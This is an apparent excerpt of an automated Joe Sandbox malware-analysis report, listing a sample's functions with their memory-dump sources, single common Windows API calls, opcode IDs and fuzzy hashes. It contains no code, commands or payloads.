                                                                                                        • Opcode ID: 62f16f13ef0eaa7e974c63e2525609a2590f46bfbbb0cf586c3ce45aa74c10a2
                                                                                                        • Instruction ID: eda7ab9fec447cd6a5c74962d651f431fd2c99cad9dcdd7647ed2925fb99a61c
                                                                                                        • Opcode Fuzzy Hash: 62f16f13ef0eaa7e974c63e2525609a2590f46bfbbb0cf586c3ce45aa74c10a2
                                                                                                        • Instruction Fuzzy Hash: 09B0923104522DABDA402BA1EC09B883F2BEB06A62F005013F60D440628B625450EED1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F487C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • EnumSystemLocalesW.KERNEL32(00F487B4,00000001,?,00F476BC,00F4775A,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00F487F6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EnumLocalesSystem
                                                                                                        • String ID:
                                                                                                        • API String ID: 2099609381-0
                                                                                                        • Opcode ID: 4438a377c813a39f2793c673e55c2548ef838147571954592dc2e5496df23c52
                                                                                                        • Instruction ID: c91a6156b01d84f09329b4775b5bfa298e0c1b79bbc278560b128e1731c3c1c7
                                                                                                        • Opcode Fuzzy Hash: 4438a377c813a39f2793c673e55c2548ef838147571954592dc2e5496df23c52
                                                                                                        • Instruction Fuzzy Hash: F8E0EC32151308FBDF31DFA4EC45BA83BA6BB08765F104015FA5C5A564CBBAA560EB44
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F4884E Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,20001004,?,00F3580F,?,00F3580F,?,20001004,?,00000002,?,00000004,?,00000000), ref: 00F48875
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID:
                                                                                                        • API String ID: 2299586839-0
                                                                                                        • Opcode ID: 48f0061b369a0e508509559ee434948ae4b0b2f24fac2b9505b471e3dc1df827
                                                                                                        • Instruction ID: 625378692965cb146719e6e760b1c09139bd9cf44437db33f427476d6cd90b0e
                                                                                                        • Opcode Fuzzy Hash: 48f0061b369a0e508509559ee434948ae4b0b2f24fac2b9505b471e3dc1df827
                                                                                                        • Instruction Fuzzy Hash: 9AD0173240010DFF8F01AFE0EC45C6E3F6AFB08364B440401F91C46110CA3AA820EB61
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F429BB Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(?,?,00F41DA6,00F41D5B), ref: 00F429C1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                        • String ID:
                                                                                                        • API String ID: 3192549508-0
                                                                                                        • Opcode ID: 3ccf5a084599ef00e59283a9cd54a6cbae33ced3ff116ff6fc543ed877bad890
                                                                                                        • Instruction ID: e3fb7fc0331580fdf8ecb72bd4b698bc0bc96689fb0b70621bcc544dd24217b8
                                                                                                        • Opcode Fuzzy Hash: 3ccf5a084599ef00e59283a9cd54a6cbae33ced3ff116ff6fc543ed877bad890
                                                                                                        • Instruction Fuzzy Hash: 03A0113000022CAB8A002BA2EC088883F2EEB022A0B008022F80C000228B22A820AAC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F378D5 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(00F33FED,01017990,00000014), ref: 00F378D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: HeapProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 54951025-0
                                                                                                        • Opcode ID: c65cbbb4d02dca8ebcbdbad892bea3a5a0dfe28e55c8020dba2a6355c256e246
                                                                                                        • Instruction ID: d389bbd97ecc24b2499b0dbd2e2a44d5ecf7972d01f28ab78fb8ec805df958d0
                                                                                                        • Opcode Fuzzy Hash: c65cbbb4d02dca8ebcbdbad892bea3a5a0dfe28e55c8020dba2a6355c256e246
                                                                                                        • Instruction Fuzzy Hash: 45B012F03062074747280F38781810936D47708306310403EF047C1154DF30C420FB04
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F15457 Relevance: .7, Instructions: 723COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b44e7e7a68a9f35870432b9432281613876e8edf917880d26163f7d28132e04a
                                                                                                        • Instruction ID: 7a672b834f45b39e87855a0dc05946607bea88cb72cbe4d2fa674bf325fe73eb
                                                                                                        • Opcode Fuzzy Hash: b44e7e7a68a9f35870432b9432281613876e8edf917880d26163f7d28132e04a
                                                                                                        • Instruction Fuzzy Hash: 9742BF71629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A90DB38F819CA91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F19686 Relevance: .5, Instructions: 478COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8b932b7e66deb1a323cb1f821718002d2aa7f7eb170e698b78decf4f4a345aca
                                                                                                        • Instruction ID: 8b1eb24aba7a6a98bf89c789d0063f20195d3de14d902b961c284afde4cbf40b
                                                                                                        • Opcode Fuzzy Hash: 8b932b7e66deb1a323cb1f821718002d2aa7f7eb170e698b78decf4f4a345aca
                                                                                                        • Instruction Fuzzy Hash: C122E2769087068FC714CF19D09059AF7E1FF88324F558A6EE8A9A7B10C730BA95CF81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F121C0 Relevance: .4, Instructions: 443COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                        • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                                                                                                        • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                                                                                                        • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12B80 Relevance: .4, Instructions: 427COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d9ddd8c55d4763dd94c80766227bc8b01a5317a2f93a0bc1a125fd074579c944
                                                                                                        • Instruction ID: e0e7ea414d5df11d2d12bec4b4d3c08484099bc8ba255dbd2510ffdaa8ac2489
                                                                                                        • Opcode Fuzzy Hash: d9ddd8c55d4763dd94c80766227bc8b01a5317a2f93a0bc1a125fd074579c944
                                                                                                        • Instruction Fuzzy Hash: B1029E711187058FC756EE4CD49035AF3E1FFC8309F19892CD68987B64E73AAA598F82
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F18030 Relevance: .4, Instructions: 351COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                        • Instruction ID: 8c5783e07da53bbb889fa1abab74bf4c82d4a02db6ae367c499cbcddfde44fab
                                                                                                        • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                                                                                                        • Instruction Fuzzy Hash: 5CC12933E2477906D764DEAE8D500AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1A710 Relevance: .3, Instructions: 345COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                        • Instruction ID: dbd22e8e9b627f1b01155aaf8ac892b6323247d678f58318230f439a2f8afdde
                                                                                                        • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                                                                                                        • Instruction Fuzzy Hash: 39A1EA0A8090E4ABEF455A7E80B63FBAFE9CB27354E76719284D85B793C019120FDF50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F12750 Relevance: .3, Instructions: 336COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                        • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                                                                        • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                                                                                                        • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F15447 Relevance: .3, Instructions: 278COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dad3396559d46b6a88f05086c242141274a2425e79e01b686309e9dc7df67744
                                                                                                        • Instruction ID: c874725860d08d00b0b0bfe03a7507d178c8494af63a54d04488b70363a30ea3
                                                                                                        • Opcode Fuzzy Hash: dad3396559d46b6a88f05086c242141274a2425e79e01b686309e9dc7df67744
                                                                                                        • Instruction Fuzzy Hash: 7EB17560039FA686CBD3FF30911028BF7E0BFC525DF44194AD99986864EF3EE94E9215
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F16B80 Relevance: .3, Instructions: 251COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                        • Instruction ID: 16a6217f1549b7c05fa4067e3079dd6b63ca64e362473e353c09c1afaca73722
                                                                                                        • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                                                                                                        • Instruction Fuzzy Hash: E89125739187BA06D7609EAE8C441B9B6E3AFC4210F9B0776DD9467242C9309E0697D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1BDC0 Relevance: .2, Instructions: 239COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642110443.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642137305.000000000101A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642150873.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001020000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642164442.0000000001039000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1642191455.000000000103B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                        • Instruction ID: 808819e0042e9c00adc466ea4d4eb354dde8e8b21224e2a36ee464d8a79ef340
                                                                                                        • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                                                                                                        • Instruction Fuzzy Hash: 77B16AB5E002199FCB84CFE9C885ADEFBF0FF48210F64816AE519E7301E334AA558B54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F19F76 Relevance: .2, Instructions: 227COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1642055463.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1642042128.0000000000F10000.00000002.00000001.01000000.00000003.sdmpDownload File
